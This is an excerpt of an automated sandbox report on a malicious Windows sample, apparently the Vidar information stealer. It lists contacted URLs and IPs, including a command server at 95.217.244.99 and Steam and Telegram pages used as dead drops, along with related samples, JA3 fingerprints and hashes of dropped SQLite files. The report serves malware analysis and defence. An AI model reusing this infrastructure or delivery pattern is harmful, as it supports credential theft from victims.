https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/about/	76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://t.me/snsb82At	file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://95.217.244.99	76561199677575543[1].htm.1.dr	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/news/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BAAFIJKK.1.dr	false		high
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/discussions/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/stats/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/steam_refunds/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BAAFIJKK.1.dr	false		high
https://steamcommunity.com/H	RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/workshop/	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/legal/	RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://t.me/snsb82	file.exe, file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
http://www.sqlite.org/copyright.html.	RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.1.dr	false		high
https://95.217.244.99EGHJ	RegAsm.exe, 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	76561199677575543[1].htm.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BAAFIJKK.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=C4Kx	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/profiles/76561199677575543w	RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net	RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://store.steampowered.com/	76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://ac.ecosia.org/autocomplete?q=	BAAFIJKK.1.dr	false		high
https://95.217.244.99/nss3.dlljL	RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://95.217.244.99/vcruntime140.dllu	RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.244.99/B	RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.steampowered.com/	RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/mobile	RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/	76561199677575543[1].htm.1.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BAAFIJKK.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.217.244.99	unknown	Germany		24940	HETZNER-ASDE	false
23.47.27.74	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430555
Start date and time:	2024-04-23 21:43:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/27@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 78 Number of non-executed functions: 200
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
21:43:58	API Interceptor	1x Sleep call for process: WerFault.exe modified
21:44:00	API Interceptor	1x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
95.217.244.99	file.exe	Get hash	malicious	Vidar	Browse
23.47.27.74	https://steamfiller.ru/	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	i1crvbOZAP.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	yU3icg18lq.exe	Get hash	malicious	Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	file.exe	Get hash	malicious	Vidar	Browse	23.65.246.108
	file.exe	Get hash	malicious	Vidar	Browse	184.27.10.105
	file.exe	Get hash	malicious	Vidar	Browse	23.61.62.148
	file.exe	Get hash	malicious	Vidar	Browse	184.30.122.179
	SamFw Tool 4.exe	Get hash	malicious	Vidar	Browse	23.4.32.216
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	23.4.32.216
	file.exe	Get hash	malicious	Vidar	Browse	23.61.62.148
	file.exe	Get hash	malicious	Vidar	Browse	184.30.122.179
	file.exe	Get hash	malicious	Vidar	Browse	104.67.208.180
	SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.76.43.59

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	https://sunhos-my.sharepoint.com/:b:/g/personal/mcaffrey_suncrestcare_com/EVEm8VhV9TBDp7AQUrliImYB4Kt7rXcd_m6-8qNUjxBhTA?e=P3XNTL&xsdata=MDV8MDJ8cHJpY2hhcmRzb25AY2FsdG9uLmNvbXxkM2U5ZTc1MTlkNDA0NmI2OWMzODA4ZGM2M2JhOTA4Y3w3YjU1NzU2YTg5NTg0ZWNlODFkYzVkYTZhYmRiNmE5N3wwfDB8NjM4NDk0OTAwMTUyMzMwMjUxfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=TldIbEg2OTJiSkRUS29RRElmU3dYbTBRQUlqUTBBMXZPcGlIaTlzNnlOQT0%3d	Get hash	malicious	HTMLPhisher	Browse	23.50.113.17
	file.exe	Get hash	malicious	Vidar	Browse	23.65.246.108
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	23.193.106.150
	https://netorgft12232017-my.sharepoint.com:443/:f:/g/personal/lisa_imjts_com/EsnpAMoHQfhBluK8Y5tDE68BaHrT-12huxTJR_ZqVWR4tA?e=5%3aZZh3dZ&at=9	Get hash	malicious	Unknown	Browse	23.210.240.138
	https://www.msn.com/en-us/autos/enthusiasts/what-s-the-difference-between-a-shelby-mustang-and-a-regular-mustang/ar-AA1ntM5Z?ocid=entnewsntp&pc=U531&cvid=8b8aa9e3e14d4164a6a2181020104694&ei=36	Get hash	malicious	Unknown	Browse	23.54.44.246
	1mHUcsxKG6.elf	Get hash	malicious	Mirai	Browse	23.61.238.0
	file.exe	Get hash	malicious	Vidar	Browse	184.27.10.105
	sora.arm.elf	Get hash	malicious	Mirai	Browse	172.226.192.139
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	172.228.222.88
	Gam.xls	Get hash	malicious	Unknown	Browse	23.46.224.162
HETZNER-ASDE	https://webmail.cmxserver.com/authsecure/index.php?email=kaylen@virtualintelligencebriefing.com	Get hash	malicious	Unknown	Browse	136.243.80.35
	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	#4711 Cotizaci#U00f3n.exe	Get hash	malicious	AgentTesla	Browse	94.130.55.203
	https://go-g3t-msg.com/clk/a_OsB_gBHRWO62vTWAvzpOfGhlvCmgnqQuB_nVFpwp0KsQNH4MVSSKRIuzJYdR_BaVVJ5ZUVsLA7nr4fsUb6_LUiF6WGpw3bjwuz5vIgSMwTtrE34sfAdm_UkarEQxhut5pfRW1RXCEHttsR2H4S_hK5eTdM2QP7CpynnqXHAbBrQcsZM-9kqSh5d_nLiZhEZPZ8-fFHjtAo-IjMx8qNxpwUaG3dVXhIP_Sup8raijFjXrg2qZL33tH_5PvkpDXJwZtdK-fqRvdTEjPP1v26xG4zHKIduU5irbL6N1Be1W_4vpi6D3s8twjJ8VAELgUZErAiigzfRVU0knOdQpcprkwW48npT3pYYpFqQU_lE9JBwESVd70JOVQuZWj_0cT7YVVRRta1y8F8vjFBDtNL73BXlqjP5sWlGZtuOnQDJ-iEKMXGy1W4uSrGBn5j07qBR3I1glqsVkAz7msz4iUFsVZ76hS_yvRcDNZBMYnXgKJRgA1A2nVJ9rwv5a55G82GhCYmOQvkUs0eG7vFHjr8gNQtxUn0q5LeVhTPJbym_uRj-gxiLJDjsLnSJXJ4eGtDvxVqhkaqM2P03jYs6BzR_fyd4ak2ZNKBm4FiGWKP44e6keEO2eNlfhZPBYG9OMlI3UM7jaU5YayqoO3Z	Get hash	malicious	Unknown	Browse	178.63.248.54
	file.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
	https://www.sushi-idea.com/	Get hash	malicious	Unknown	Browse	168.119.90.21
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	49.12.86.202
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	168.119.13.211
	scripttodo.ps1	Get hash	malicious	Unknown	Browse	46.4.134.23
	scripttodo.ps1	Get hash	malicious	Unknown	Browse	46.4.134.23

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	SamFw Tool 4.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	95.217.244.99
	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	95.217.244.99
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	23.47.27.74
	768.xla.xlsx	Get hash	malicious	Unknown	Browse	23.47.27.74
	file.exe	Get hash	malicious	Vidar	Browse	23.47.27.74
	anuwhqTXGt.dll	Get hash	malicious	Unknown	Browse	23.47.27.74
	anuwhqTXGt.dll	Get hash	malicious	Unknown	Browse	23.47.27.74
	PO 26519PZ F30 59.vbs	Get hash	malicious	FormBook, GuLoader	Browse	23.47.27.74
	Texas_Tool_Purchase_Order#T18834-1.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	23.47.27.74
	TRANSPORT_INSTRUCTION_MR.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	23.47.27.74
	Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	23.47.27.74
	shipping document.vbs	Get hash	malicious	FormBook, GuLoader	Browse	23.47.27.74

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\IDHIIJJJKEGI\mozglue.dll	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	tt1pR7pJbF.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	IvxnEUAtC3.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\IDHIIJJJKEGI\freebl3.dll	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	bhhPvHM59A.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	tt1pR7pJbF.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	IvxnEUAtC3.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AAFIDGCFHIEHJJJJECAKKJDBAF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAAFIJKK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFIDGHDB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGDBAEHIJKKFHIEGCBGCAFIJJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIIJDHC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHIJDHCAKKFCBGCBAAEC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
